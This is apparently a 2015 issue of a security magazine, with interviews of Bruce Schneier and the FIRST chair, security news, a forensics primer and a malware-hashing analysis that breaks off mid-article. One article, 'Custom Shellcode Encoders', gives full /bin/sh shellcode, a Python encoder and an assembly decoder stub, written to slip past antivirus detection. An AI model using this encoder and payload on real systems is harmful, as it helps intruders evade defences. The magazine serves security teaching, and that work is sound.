Security Kaizen Magazine, Issue 19


Vol. 5, Issue 19, March - April 2015

Knowing Your Adversary - Implementing a Cyber Threat Intelligence Program

Interview with Mr. Maarten Van Horenbeeck, Chairman of First.org

Interview with Mr. Bruce Schneier, Security & Terrorism Expert

www.bluekaizen.org


Issue 17 | Securitykaizen Magazine | 5





Contents

Interviews
5 Interview with Mr. Bruce Schneier, Security and Terrorism Expert
9 Interview with Mr. Maarten Van Horenbeeck, Chairman of First.org

Grey Hat
13 Custom Shellcode Encoders

Digital Forensics
16 Computer Forensics in the Real World

New & News
19 Bluekaizen News

Reviews
21 Malware and Hashing: Hiding Functionality (Malware Review)
25 Neurevt Bot Malware Analysis (Malware Review)
32 Knowing Your Adversary - Implementing a Cyber Threat Intelligence Program (Intelligence Review)

Best Practice
35 Operating SIEM Solution



Editor’s Note

Moataz Salah
Chairman & Editor-in-Chief, Bluekaizen Founder

In this issue we have two unique interviews. The first is with the security guru Bruce Schneier, one of the most famous security figures. We interviewed Bruce about cryptography, privacy, Edward Snowden and the NSA leaks, and many other interesting topics. The interview was very beneficial and I hope you will enjoy reading it as much as I enjoyed preparing it. The second interview features Maarten Van Horenbeeck, the president of FIRST. We had an amazing opportunity to chat about FIRST membership, which most CERTs around the world are so keen to join: what are the benefits of being a FIRST member? What are the different activities of FIRST? Maarten also gave us some tips and recommendations for mitigating an incident. I am very proud to have these two interviews in one issue. This quarter is also full of activities. As mentioned in issue 18, we will make a special appearance at the Regional Cyber Security Summit in Oman, organized by Oman CERT and Bluekaizen. We helped promote a new idea to the cyber security community in the region, Arabic cyber security products, through the Cyber Innovation Competition. In a few weeks we were able to gather more than 14 projects. Most of them were promising; they were shortlisted to 4 projects that will pitch at the summit to win valuable prizes. Moreover, Bluekaizen is making its usual special appearance at GISEC in Dubai this April. GISEC is one of the biggest exhibitions for security companies in the Middle East.

Another international appearance for Bluekaizen will be next June at the annual international conference of FIRST in Berlin. Bluekaizen will have the opportunity to show its magazine and activities to government representatives and incident response members of FIRST.

Magazine Team
Editor: Mohamed H. Abdel Akher
Contributors: BK team, Khaled Sakr, Mohamed Gamal Abdelraouf, Prof. James L. Antonakos, Eng. May Medhat, Harris D. Schwartz, Ayman Hammouda
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Ahmed Mohamed
Proofreading: Jeff Compton
Design: Mohamed A. El-Maghraby

Security Kaizen is issued bi-monthly. Reproduction in whole or in part without written permission is strictly prohibited. All copyrights are reserved to www.bluekaizen.org. For advertisement in Security Kaizen Magazine and the www.bluekaizen.org website, e-mail info@bluekaizen.org or phone +2 0100 267 5570 / +971 5695 40127.



Interviews

Mr. Bruce Schneier

Interview with Mr. Bruce Schneier

Security and Terrorism Expert

Can you please introduce yourself to security Kaizen magazine readers (BIO, Experience)?

I'm Bruce Schneier. I work at the intersection of security, technology, and people. I do a lot of things, but the two important things right now are that I am the CTO of Resilient Systems, Inc., which sells incident management software. Basically, it's a collaborative platform that allows incident response teams to coordinate their activities. Also, I just published a new book on surveillance and what to do about it. It is Liars and Outliers: The Hidden Battles to Collect Your Data and Control Your World. I'm also speaking at the Gulf Information Security Expo & Conference (GISEC), happening at the Dubai World Trade Centre (DWTC) from 26-28 April 2015.

BK Team



What are the major problems we're facing on the Internet today?

I worry about many Internet problems. I worry about crime. I worry about government surveillance, in both my own and other countries. I worry about corporate surveillance, which is rampant on the Internet. Mostly I worry about data: how it is generated, who has access to it, what they can do with it, how they store it, and how they dispose of it. Many of the problems on the Internet can be traced to all this data. This is the focus of the two things I have been working on. Data and Goliath looks at the world of surveillance. I examine both corporate and government surveillance: who does it, how they do it, and what they do with our data. Then I discuss the problems of surveillance and why privacy is an important value. And finally, I give both technical and political solutions to deal with both corporate and government surveillance, both domestic and foreign. My company, Resilient Systems, helps companies defend their data against attack by giving them tools to improve their incident response. Incident response is a vitally important and long-neglected part of IT security, and I want to change that.

How do you define security?

I could write a book on that question alone. Setting aside the philosophical discussions, good security is a combination of protection, detection, and response. We need all three, because none of them can do it all individually. We know this in the real world, but we are finally learning it in the IT world. The 1990s was the decade of protection. The 2000s was the decade of detection. And this is the decade of response. The goal, of course, is resilience. Good security is resilient.

What is cryptography? How do you see the importance of cryptography in securing the infrastructure of countries?

Cryptography is a mathematical technology that is useful in some security applications. It's important, but it's just a piece of technology. Good security involves many technologies, and also people and process. So while it's important, its value can easily be overstated.

Do you think that cryptography can solve all the security issues?

Of course not. That's like asking if door locks can solve all security issues. Cryptography is part of the solution to those security issues that need cryptography. For example, cryptography can absolutely protect against some types of surveillance. It can protect the contents of emails and messages as they go across the Internet. But it cannot protect the surveillance data that your cell phone constantly generates so that the cell network knows where you are.

Do you think that security agencies can crack Internet privacy tools like Tor, for example?

What we've learned from the Snowden NSA documents is that cryptography tools like PGP, Tor, OTR, and so on are secure from the NSA, at least in bulk. They cannot break the cryptography in these tools. The NSA, and other governments as well, has many tools to get around cryptography, but they do not scale as well as intercepting and analysing unencrypted traffic.


How do you see Edward Snowden's leaks about the NSA and the whole PRISM thing?

The Snowden documents have given us an extraordinary and unprecedented window into the NSA's activities. I think it's important to understand that while the US has a larger intelligence budget than the rest of the world combined, they're not made of magic. The NSA tools and techniques disclosed by Snowden are the same ones being used by China, Russia, and other countries. And technology democratizes. Today's top-secret NSA programs are tomorrow's PhD theses and the next day's hacker tools. So while it may seem that the NSA is more advanced than everyone else, what we're really seeing is a preview of what the hackers are going to do next year.

How do you see the future of cyberattacks, especially in the Middle East region?

The future of cyberattacks is going to look like the present, only more so. There will be criminal attacks around the world as long as personal data provides the ability to commit fraud and intellectual property is worth stealing. Governments will continue to attack each other and their own citizens as long as there is value there. And hacktivists will continue to attack organizations for political purposes. I don't see any of this changing, and I don't see a lot of regional differences. As the Middle East catches up to the rest of the world in Internet infrastructure, it will see more and more of these sophisticated cyberattacks.

How do you see the future of the security industry in the Middle East?

As attacks get more sophisticated, defence must similarly get more sophisticated. There's a bright future for the security industry in the Middle East, because with the exceptions of the banking and oil sectors the region has generally not had enough IT security. This is going to change. Resilient Systems opened a European office early this year, and we're already seeing significant demand in the Middle East. I suspect that other Internet security companies are experiencing the same thing.





Interviews

Interview with Mr. Maarten Van Horenbeeck, Chairman of First.org

BK Team

Can you please introduce yourself to Security Kaizen magazine readers (bio, experience)?

I'm originally from Belgium, where my career in information security started over ten years ago, when I took up a job as a technical writer for the security website Securitywatch.com. The website closed a year later, but I stayed on for eight years as a security engineer with its parent security company, Ubizen. After a number of different roles there, working on managed security services, security assessments and forensic investigations, I moved to Seattle, Washington, where I joined Microsoft as part of the team that addresses software vulnerabilities in their products. After some time on Google's security team, today, outside of my work for FIRST, I manage a security team at Amazon. My passion has always been understanding and investigating complex security attacks. I am very fortunate to have had numerous opportunities to investigate targeted attacks in my career so far. Not only are these investigations interesting and often unusual, but they are also a great learning experience. As adversaries are intelligent, and actively aim to identify weaknesses in the security controls we build, they continuously change tactics, and staying on top of these changes is an exciting endeavor.


WWW.First.org

Can you give us a brief overview of FIRST? What are its role, activities and initiatives?

FIRST is an international association of computer security incident response teams. We are truly global, with over 300 member teams in 70 countries. Our goal is to enable our members to improve their response to security incidents by providing them with access to tools, best practices and a trusted community. We were founded in 1990, shortly after the Morris worm, one of the first Internet worms to gain widespread attention. We organize events which allow for knowledge transfer between members, and support working groups between both members and non-members that want to collaborate on a technical incident response or security topic. In addition, we drive standards development, organize training and education efforts, and reach out to other communities on behalf of our members. Much of FIRST is driven by our membership, and we maintain our quality standards by making sure that any new member is vetted by at least two other member teams, ensuring they are able to productively contribute and work on incidents with other members.

FIRST also actively works to expand the community of incident response teams. When you deal with an incident, it's important to be able to find a peer who has some amount of influence over the network which is attacking you. Just a year ago, we launched the FIRST Fellowship Programme, which offers CSIRT teams from across the world which may not have the means or experience to participate in our community a gentler way in. Provided they have a basic level of maturity, and can show us the role they play in their local community, FIRST will help them, both financially and through training, to play a bigger part in the community and become a member. Another area where we want to grow is by expanding into different industries. While we have members across all major sectors, a year ago we realized that FIRST had few participants from the energy sector. We organized a symposium specifically focused on this sector in Washington DC, and invited a few members to come and present their incident response challenges, as well as teach a course on incident response. We see connecting our members with other industries as an important goal of FIRST.

What types of membership exist in FIRST? Is it per individual or per organization?

FIRST membership is, in principle, organizational. Organizations can apply to become a member and will need to find two sponsors from the existing FIRST community to assess their level of capability against a checklist. If both teams agree that the organization would be a great fit for FIRST, its membership will be considered. FIRST does have another membership type, FIRST liaison membership, which is for representatives of organizations other than incident response teams that have a legitimate interest in FIRST. We have a small number of liaison members at any given time and their applications also need to be supported by an existing member of the community.

What are the benefits of joining FIRST?

Teams that join FIRST gain a number of benefits, but I'll focus on three specific ones. First of all, they gain access to a community of professionals who are dealing with very similar problems. We provide tools for communication, such as a wiki, e-mail lists and ways to quickly find contacts at other member organizations.


Second, we support and nurture working groups between members. These can take various forms, from discussion groups at conferences to more structured working groups with a particular technical goal. This might range from creating better standardized methods for describing and coordinating security incidents to real standards-building efforts that may end up in external standards bodies. A great example of the latter that we've supported for quite some time now is the Common Vulnerability Scoring System (CVSS), which is a standard for describing the impact of security vulnerabilities. The FIRST working group is currently preparing the third iteration of the standard. Previous versions have been widely adopted by security vendors and vulnerability coordinators. Finally, we give members the opportunity to exchange experiences directly, through training sessions, conferences, and smaller events. Every year we have at the very least our annual conference on incident handling, a number of training sessions with regional partners, and a symposium, a smaller conference which is aimed at bringing incident response knowledge to the wider community, not just our members. In addition, FIRST members regularly organize smaller events which focus on getting members together and sharing best practice and experience.

Can you tell us more about the FIRST annual conference?

The Annual FIRST Conference on Computer Security and Incident Handling takes place in June, and has travelled the world to bring together our members and their peer incident responders from government, industry and academia. The conference has previously taken place in Boston, Bangkok, Malta and Vienna. This year it will be held 14th-19th June in Berlin, Germany. More information can be found at https://www.first.org/conference/2015. Our conference focus this year is on unified security: how do we improve the future of incident response, make it a more integral part of business processes, and help us understand the security landscape? The FIRST Conference is a multi-track conference which focuses on the technical, process and even policy requirements of proper security incident handling. For example, in 2014 we had a keynote on how the FBI dealt with investigating the Boston Marathon bombings, and sessions ranged from a panel on cybersecurity risk indicators, which governments can use to assess and improve the effectiveness of their cybersecurity, to very technical talks on recent security issues, such as open DNS resolvers, the status of the CVSS project, and how to process intelligence feeds. The conference is very informative and we aim to make it accessible to everyone involved in the incident response community, whether they approach the issue from a technical or a people perspective. The conference is also a good opportunity for our members to find out more about FIRST's activities and to generally catch up on things; we provide an update on the current year and a preview of the next year's business plan, and there are plenty of opportunities for members to have side meetings and group discussions. One of the most amazing things I have seen at a FIRST Conference is different CSIRT teams going out for drinks together, and actually getting out their laptops in the pub to improve the tools and technologies they use during investigations. It shows that we're really not simply a conference or an association, but a community.

What are the objectives and plans for FIRST in 2015?

Each year we have a number of different focus areas, but for 2015 the most important one is training and education. For a number of years, FIRST has partnered with organizations to deliver incident response training. Most recently, we organized a number of courses with the GÉANT Association, which represents the European research and education networks; we also worked with AfricaCERT to organize TRANSITS courses. TRANSITS is affordable, high-quality training, mostly focused on the technical elements of the incident response process. In 2015, FIRST will be continuing to collaborate with a number of organizations involved in training and incident response to develop a comprehensive training curriculum for incident response teams. Our goal is to develop materials and events which are aimed at helping a "team" work well, rather than focusing on individual technical skills. This effort is ongoing, and we plan to make significant progress in a number of meetings throughout the course of the year, in particular at our annual conference. If our efforts are successful, then I think we can make a massive impact in professionalizing the way we respond to industry-wide incidents, a core area of concern for our members.


Through your professional experience, what are the most famous causes of incidents?

Personally, I believe Stuxnet and Conficker were game changers. Since then, there has been a rapid growth in the types of scenarios that we as incident responders have to prepare for, and it isn't showing any signs of slowing down. In the case of Stuxnet, we saw the complexity of multiple zero-day vulnerabilities embedded in a single piece of malware, and the complexity of having to deal with impacts on software which was not widely understood. Even though the malware was well distributed within the community, pools of local talent learned specific things about Stuxnet which were not known to others. It was a prime example of why we need more collaboration in our industry in order to be effective. There are few security teams with all the necessary skills to investigate and truly understand the impact of such an event. Conficker drove home that same point: a large group of people needed to be involved to contain the incident and stop the worm from infecting new systems. In addition, we saw a number of new propagation vectors, and an adversary that adjusted tactics as the defenders responded. Some of the entities involved in the response were not necessarily security experts: organizations such as national domain registries. The key in responding to an event like Conficker was communication, and not necessarily the technical challenge which the malware posed. However, not all cyber security problems are the result of technical complexity and scope. Very simple issues still cause tremendous amounts of grief. Recently, we've seen ever larger Distributed Denial of Service attacks. Most of those attacks could be significantly mitigated if more Internet service providers and network operators deployed a standard known as BCP38, which was finalized as far back as May of 2008. Yet this hasn't happened, and so we are still dealing with basic problems that are affecting even some of the largest providers.

If you were asked for a few tips, what are the main recommendations to mitigate an incident?

Successful response to an incident involves careful preparation. Has your organization developed runbooks for the work your team needs to do during an incident? Have you done table-top exercises for a few major incidents, including those for which your team is not actively preparing, but which would have a major impact on your organization? Second, it's great to know your partners. For most organizations it's not reasonable to assume that your team can deal with every problem. Performing a basic forensic investigation of a hard drive is a very different skill from performing memory forensics, assessing the integrity of a router, or analyzing an exploit for a brand new vulnerability. Organizations need to take a close look at their capabilities, understand where they may be lacking, and make sure they have enough friendly teams in the industry they can partner with to get the job done. This may include agreeing with another team that you can support them with one very technical method of investigation, and in return using their help with another type. Or, it may mean contracting a security vendor to provide particular services. These types of agreements are not something you'd want to decide on during a major incident. Having a contact list available is invaluable; it's too late to pull out the Yellow Pages when an incident hits. Finally, make sure your network is designed and improved in such a way that it already rules out some types of incidents happening. This allows your security team to focus on the issues where their expertise is really required. When your team is busy dealing with spam, banking Trojans or small DDoS attacks, they don't have time to prepare and study the major attacks which may affect your organization next. It helps to have someone focus on assessing trends in security incidents, so you can assess how your organization would fare if it was affected by a similar issue.




Grey Hat

Custom Shellcode Encoders

Introduction

We have all used Metasploit shellcode encoders such as the XOR encoder, shikata_ga_nai and many others. Because these encoders are used by most attackers, they are prime targets for antivirus fingerprinting, so what about writing your own? In this article we will see how easy it is to write a custom encoder; writing one that is not easily fingerprinted by antivirus is the hard part.

Khaled Sakr
Information security engineer at Security Meter


Shellcode and Encoders

Shellcode is the piece of code used as the payload when exploiting a software vulnerability, for example to spawn a shell. Nearly all Metasploit shellcodes are fingerprinted by most antivirus products, so we use encoders to encode the shellcode and try to obfuscate (hide) it from them. Instead of using, for example, the plain shellcode that spawns "/bin/sh", the new shellcode will be [encoded shellcode + a decoder stub], where the stub decodes the encoded shellcode at runtime.

In this article we will write both the encoder, in Python, and the decoder, in assembly language, from scratch. The plan is:
1. Get a shellcode for "/bin/sh".
2. Encode the shellcode using a custom technique.
3. Write a decoder stub that takes the encoded shellcode and decodes it at runtime.
4. Generate the new shellcode (the shellcode of the decoder program).

Writing the Encoder

For this article I have chosen an encoder that is simple enough to illustrate in print: the swap encoder. It takes every two bytes of the shellcode and swaps them, which leaves a sequence of hex values that no longer means anything. Imagine a shellcode like \xA2\xAA\xBF\xC3\x44\x1A...; swapping each pair gives \xAA\xA2\xC3\xBF\x1A\x44...

We will develop the encoder as a Python script; the code is commented and should be self-explanatory. In the example below our original "/bin/sh" shellcode is 28 bytes: "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80". Note that the decoder we write later hard-codes the number of pairs it swaps back (14 for this 28-byte shellcode), so if you encode a shellcode of a different length, update that count as well.

    #!/usr/bin/python
    # Swap encoder: swaps every pair of bytes of the shellcode

    # The /bin/sh shellcode, 28 bytes long
    shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89"
                 b"\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80")

    if len(shellcode) % 2 == 1:  # if the length is odd, prepend a NOP (0x90) so the bytes pair up
        shellcode = b"\x90" + shellcode

    # an empty string which will hold our encoded shellcode as "\xNN" text
    encoded_shellcode = ""

    # x holds one byte of the shellcode per element, e.g. x[0] = 0x31, x[1] = 0xc0
    x = bytearray(shellcode)

    # the loop below performs the swap, stepping through the shellcode two bytes at a time
    for i in range(0, len(x), 2):
        temp = x[i]                                # save the even byte (x[0] = 0x31 on the first pass)
        x[i] = x[i + 1]                            # old x[0] = 0x31, new x[0] = 0xc0
        encoded_shellcode += '\\x%02x' % x[i]      # append the new value, "\xc0", to the encoded shellcode
        x[i + 1] = temp                            # swap completed: x[1] is now 0x31
        encoded_shellcode += '\\x%02x' % x[i + 1]  # append the new value, "\x31"

    # leave the loop and print the encoded shellcode
    print(encoded_shellcode)

Running the script prints our encoded shellcode:
\xc0\x31\x68\x50\x2f\x2f\x68\x73\x2f\x68\x69\x62\x89\x6e\x89\xe3\x89\xc1\xb0\xc2\xcd\x0b\x31\x80\x40\xc0\x80\xcd



The Jmp-Call-Pop Trick

After writing the encoder we have to write an assembly program that takes the encoded shellcode as input and adds a decoder stub that decodes it at runtime; the shellcode of this assembly program is the new shellcode we are going to use. The steps are:
1. Hard-code the encoded shellcode inside the assembly program.
2. Get the address of the encoded shellcode.
3. Decode the encoded shellcode.
4. Pass control to the decoded shellcode.

First we need to consider that the address of the encoded shellcode cannot be hard-coded in the program: we don't know where it will be located in memory, and it may differ from one computer to another. The technique that solves this is called "jmp call pop". The idea is that when a call instruction executes, the address of the next instruction is pushed onto the stack; if we place our encoded shellcode immediately after the call instruction, we obtain its location simply by popping it off the stack. Let's see the technique in action. The program skeleton looks like this:

        jmp Get_addr            ; first, when the program starts it jumps to Get_addr
    Decode:
        pop esi                 ; finally, it pops the address of encoded_shellcode into esi
        ...
    Get_addr:                   ; second, the call pushes the address of the shellcode onto the stack
        call Decode
    encoded_shellcode: db 0xc0,0x31,0x68,0x50,0x2f,0x2f,0x68,0x73,0x2f,0x68,0x69,0x62,0x89,0x6e,0x89,0xe3,0x89,0xc1,0xb0,0xc2,0xcd,0x0b,0x31,0x80,0x40,0xc0,0x80,0xcd

Because the call goes backwards, its 32-bit displacement is negative (0xFF bytes) and contains no null byte, which a forward call to a nearby label would; the two short jumps use 8-bit displacements for the same reason.

To visualize this better, run the program under gdb, set a breakpoint at the pop esi instruction and examine the memory esi points to. x/28xb $esi is the gdb command that examines 28 bytes at the location held in esi. As the figure shows, it points to our encoded shellcode \xc0\x31\x68...

Finally we can write our decoder.

Writing the Decoder

    global _start                ; define the program entry point

    section .text                ; .text section where the code lives
    _start:
        jmp short Get_addr       ; jmp-call-pop technique

    decoder:
        pop esi                  ; get the address of the encoded shellcode into esi
        xor ecx, ecx             ; ecx = 0
        ; the shellcode is 28 bytes long, so we iterate 14 times to swap the whole
        ; shellcode back (ecx is our counter)
        mov cl, 14

    ; here lies the decode stub
    decode:
        xor eax, eax             ; eax = 0
        ; assembly has no mov between two memory locations, so al and bl hold each
        ; byte temporarily; [esi] is the byte esi points to, 0xc0 on the first pass
        mov al, byte [esi]
        xor ebx, ebx             ; ebx = 0
        mov bl, byte [esi+1]     ; [esi+1] is 0x31 on the first pass
        mov byte [esi], bl       ; write bl over [esi]
        mov byte [esi+1], al     ; write al over [esi+1]
        add esi, 2               ; advance esi by two to the next pair
        loop decode              ; decrement ecx and repeat until the swap is complete
        jmp short shellcode      ; pass control to the decoded shellcode

    Get_addr:                    ; jmp-call-pop technique
        call decoder
    shellcode: db 0xc0,0x31,0x68,0x50,0x2f,0x2f,0x68,0x73,0x2f,0x68,0x69,0x62,0x89,0x6e,0x89,0xe3,0x89,0xc1,0xb0,0xc2,0xcd,0x0b,0x31,0x80,0x40,0xc0,0x80,0xcd

One caveat when testing this as a standalone program: the decoder writes into the .text section, which is read-only in a normally linked ELF, so the first mov byte [esi], bl would fault. Link with ld -N (nasm -f elf32 decoder.asm; ld -m elf_i386 -N -o decoder decoder.o) to make the text segment writable. In a real exploit the bytes run from whatever memory the target gives them, which must be both writable and executable for the in-place decode to work.



Digital Forensics

Computer Forensics in the Real World

Nearly everyone is connected to the Internet in some form or manner, by smartphone, tablet or laptop. With such connectivity comes crime, which brings the need for investigators with a specific skill set to be able to investigate, track and apprehend criminals in the digital world. This is where the exciting and ever-changing world of computer forensics begins. As a computer forensic examiner you will find yourself tracking child pornographers, cyber thieves and terrorists, responding to the worst of crimes, all in an effort to deter and stop cybercrime. A very exciting field indeed! We will run a series of articles on computer forensics every issue to give a complete picture of the topic.

Mohamed Gamal Abdelraouf
Security Researcher


What Is Computer Forensics?

The preservation, identification, extraction, interpretation and documentation of computer evidence, to include the rules of evidence, legal processes, integrity of evidence, factual reporting of the information found, and providing expert opinion in a court of law or other legal and/or administrative proceeding as to what was found.

The importance of computer forensics:

Computer forensic investigation techniques are not only useful for solving cyber crimes such as computer hacking; they have also helped to solve other crimes such as murder, terrorism, organized crime, tax evasion, drug smuggling, extortion and robbery cases. Computer crime is here to stay and is increasing rapidly. Cyber criminals are not just hackers looking for street credibility. Many of them are professionals motivated by financial gain and targeted espionage. The purpose of computer forensics techniques is to search, preserve and analyze information on computer systems to find potential evidence.

Evolution of computer forensics:
•1984 Computer Analysis and Response Team (CART) was developed to provide support to FBI field offices in the search of computer evidence.
•1993 The first international conference on computer evidence was held.
•1995 International Organization on Computer Evidence (IOCE) formed.
•1998 International Forensic Science Symposium (IFSS) formed to provide a forum for forensics.
•2000 The first FBI Regional Computer Forensic Laboratory was established.

Types of computer crimes:
•Identity theft
•Hacking
•Computer virus
•Cyber stalking
•Credit card fraud
•Investment fraud
•Email bombing and spam
•Phishing and spoofing


What do Computer Forensic Investigators look for?

•Saved Files - These are data files that exist in a form that can be readily used. Usually they are well organized in proper directories. A good investigator will also look for files that are hidden in strange directories or even marked to be hidden from the operating system.

•Deleted Files - When a file is deleted from a computer, it is not altered in the least. The operating system is just told to ignore that it exists. Unless the operating system writes new data over the old, it is easily recovered.

•Temporary Files - Operating systems and programs temporarily store a copy of working data in various places. Sometimes it is in the same location as the original. More frequently it is in a specially designated folder specifically for temporary files. The operating system also uses something called a swap file for its working files. While these are intended to be temporary, they can linger for the life of the computer.

•Metadata - This is a term that refers to corollary information that is stored along with data. It includes such things as the date the file was created, modified and last accessed. It can tell us the original owner as well as everyone who has ever used it. Sometimes it contains previous versions of the document.

•Disk Slack - This is the most technically challenging. Sometimes when data is stored, it accidentally captures data from previous documents. With the right software, this can be searched and the old data resurrected.

IT Knowledge Prerequisites

For this area the following knowledge is a must. I’m correlating the corresponding certifications that might help later to validate your knowledge to future employers.
• Networking (Network+)
• Computer Systems (A+)
• Windows and Linux Operating Systems
• Security (Security+)
• Windows and Linux Systems Administration
• Cybercrime

Now let’s talk about the main certifications in the Computer Forensics field:

1- CHFI (Computer Hacking Forensic Investigator) from EC-Council. Computer hacking forensic investigation is the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks.

2- CCE (Certified Computer Examiner) from the International Society of Forensic Computer Examiners (ISFCE). ISFCE aims to professionalize and further the field and science of computer forensics, to provide a fair, vendor-neutral, uncompromised process for certifying the competency of forensic computer examiners, and to certify computer forensic examiners solely based on their knowledge and practical examination skills and abilities as they relate to the practice of digital forensics.

3- CFCE (Certified Forensic Computer Examiner) from the International Association of Computer Investigative Specialists (IACIS). It is one of the most widely recognized non-tool certifications in computer forensics for current and former law enforcement personnel; you must be employed in law enforcement to qualify for regular IACIS membership.

4- GCFA (GIAC Certified Forensic Analyst) from Global Information Assurance Certification (GIAC). It focuses on computer forensics in the context of investigation and incident response, and thus also on the skills and knowledge needed to collect and analyze data from Windows and Linux computer systems.

5- PCI (Professional Certified Investigator) from ASIS International. This is the senior-level computer investigations and forensics credential.

Conclusion

Computer forensics has become an important part of the litigation process over the last few years, and it is a vital part of the computer security process. As more knowledge is obtained about how crimes are committed with the use of computers, more forensic tools can be fine-tuned to gather evidence more efficiently and combat the crime wave on technology. In the next issue I will show how we start preparing for computing investigations.




New & News

News

A peek under the hood at the recent security breaches

Hacking Android Remotely

Security researchers have warned of a pair of vulnerabilities in the Google Play Store that could allow cyber crooks to install and launch malicious applications remotely on Android devices. The vulnerability affects users running Android version 4.3 Jelly Bean and earlier versions of Android, which no longer receive official security updates from the Android security team for WebView, a core component used to render web pages on an Android device. Users who have installed third-party browsers are also affected. According to the researcher, the web browser in Android 4.3 and prior is vulnerable to a Universal Cross-Site Scripting (UXSS) attack, and the Google Play Store is vulnerable to a Cross-Site Scripting (XSS) flaw.

BK Team


https://community.rapid7.com/community/metasploit/blog/2015/02/10/r72015-02-google-play-store-x-frame-options-xfo-gaps-enable-android-remotecode-execution-rce


Critical Ghost Vulnerability (CVE-2015-0235) impacts Linux systems

A very critical vulnerability affecting the GNU C Library (glibc) exposes Linux servers to remote command execution. This security bug was discovered by Qualys security researchers and will probably cause a lot of headaches to those who won’t update right away. The vulnerability could allow attackers to execute malicious code on servers and remotely gain control of Linux machines. It is a buffer overflow in glibc’s function __nss_hostname_digits_dots(), which is itself used by multiple others like gethostbyname() and gethostbyname2(). This is a critical issue as these functions are used in an enormous amount of software and server-level mechanisms. An attacker would need to send a very specific set of bytes to the function in order to trigger the bug and attempt to get command execution privileges on the victim’s server.

Obama’s executive order urges companies to share cyberthreat data

President Barack Obama signed an executive order on Friday that encourages and promotes sharing of information on cybersecurity threats within the private sector and between private sector companies and government agencies as well. In addition to making things more open, the executive order also calls for developing a set of standards for sharing information among companies, making it easier for organizations to form sharing agreements with the newly formed National Cybersecurity and Communications Integration Center (NCCIC). Obama also noted that major companies like Apple, Intel, and Bank of America have already signed on to the government’s new cyberthreat framework.

Deep Web Search Engine Memex Fights Crime

In 2014, the U.S. Defense Advanced Research Projects Agency (DARPA) launched the MEMEX project to design advanced search tools that could also be used to scan the deep web, which isn’t indexed by Google and other commercial search engines. For the first time, the security community has the opportunity to take a look at the MEMEX system: the Pentagon’s research agency gave Scientific American a preview of the software and 60 Minutes an exclusive look at the technology. The researchers explained that there is an impressive amount of data that is not considered useful for ordinary web users, but that represents a crucial source of information for law enforcement and intelligence agencies.

Newly discovered Android malware hijacks your phone

The AVG mobile security team recently discovered malware known as Android/PowerOffHijack, which hijacks the shutdown process so that the device remains functional even though it appears to be off. The malware affects versions of Android older than v5 (Lollipop) and requires root permission to hijack the shutdown process. After pressing the power button, the phone displays an authentic shutdown animation and appears off. Although the screen is black, it is still on. While the phone is in this state, the malware can make outgoing calls, take pictures and perform many other tasks without notifying you.



Reviews

Malware Review

Malware and Hashing: Hiding Functionality

About The Author

Professor James L. Antonakos, Forensic Investigator at WhiteHat Forensics

James L. Antonakos is a SUNY Distinguished Teaching Professor of Computer Science at Broome Community College, in Binghamton, NY, where he has taught since 1984. James teaches both in the classroom and online in classes covering electricity and electronics, computer networking, computer security and forensics, information management, and computer graphics and simulation. James is the designer and director of the new 2-year AAS Degree in Computer Security and Forensics at Broome Community College. James is also an IT security consultant for Excelsior College and an online instructor for Champlain College and Excelsior College. James has extensive industrial work experience as well in electronic manufacturing for both commercial and military products, particularly in flight control computer technology for Navy aircraft. James also consults with many local companies in the areas of computer networking and information security. James is the author or co-author of over 40 books on computers, networking, electronics, and technology. He is also A+, Network+, and Security+ certified by CompTIA and ACE certified in computer forensics by AccessData. James is a frequent presenter at the annual New York State Cyber Security Conference, the founder of WhiteHat Forensics, and an NCI Fellow for the National Cybersecurity Institute in Washington, DC.


Introduction

There is no doubt that malware coders are very good programmers. The sophistication of modern malware and its capabilities proves this point easily. However, we must also acknowledge the creativity and imagination of the malware coders, as they employ techniques to disguise what they are doing from the prying eyes of the malware analyst, intrusion detection system, or anti-virus program scanning their code.

What are some of the goals of the malware coder? Consider the following:
•Spread their malware to as many systems as possible.
•Remain undetected.
•Make sure the malware runs every time the system boots.
•Extract valuable information from the infected system.
•Enable remote access / control of the infected system.
•Write the malware code in a way that disguises its functionality.
In this article we will take a look at one way the malware functionality is disguised.

Windows DLLs

The Windows operating system makes heavy use of Dynamic Link Libraries (DLLs). These are essentially pre-written subroutines that provide many different kinds of functionality, from file system navigation, to file manipulation, process creation, communication, and calls into the kernel of the operating system to do almost anything. DLLs are designed to be loaded into memory as needed and discarded from memory when no longer needed, as a way of managing memory. They evolved from the old days of scarce memory as a way to make the most out of limited RAM. Once a DLL is loaded into memory, the functions that it exports (makes available to external programs) are accessed using a method that involves searching through a list of exported function names until the desired function name is located. Then the memory address where the function code actually resides after the DLL has been loaded into RAM is read from a corresponding entry in a different table.

Figure 1 shows an example of this: a flowchart illustrating the search activity and how a function’s code address is obtained.

Figure 1: Accessing an exported DLL function

Strange PUSHes

Anyone familiar with the organization of a run-time stack knows that many different kinds of things are pushed onto the stack when a function is called. Consider these instructions:

PUSH EAX
CALL SUB_11C

When these instructions execute, this results in the run-time stack having a parameter (from PUSH EAX) and a return address (due to the CALL instruction) pushed onto it. Once we enter the subroutine code, EBP is also pushed and then reassigned to point to the base address of the stack frame.



The stack frame now looks like this:

Figure 2: Run-time stack frame

So, within the subroutine that was called, an instruction like

MOV EBX, [EBP+8]

copies the EAX parameter from the stack frame into EBX inside the subroutine. This is a common way of using the stack to pass parameters. So, knowing this, a malware analyst might look at the disassembled code shown in Figure 3 and wonder what all the strange PUSHes are for.

Figure 3: A series of strange PUSH values

Now, there does not appear to be anything useful in many of the pushed values, although there are two PUSHes that have values that look like ASCII codes. In fact, they are ASCII codes and represent the string “URLMON” if you are familiar with the order in which byte values get PUSHed in the Intel 80x86 architecture. This is quite interesting, and possibly a clue as to what the other strange values represent.

Remember that the malware coder wants to disguise the functionality of the malicious code. Could it be that the strange hex values PUSHed onto the stack have some relation to the DLL function names being utilized? Let’s keep that thought in mind as we look at an interesting subroutine located somewhere else in the malware.

An Even Stranger Subroutine

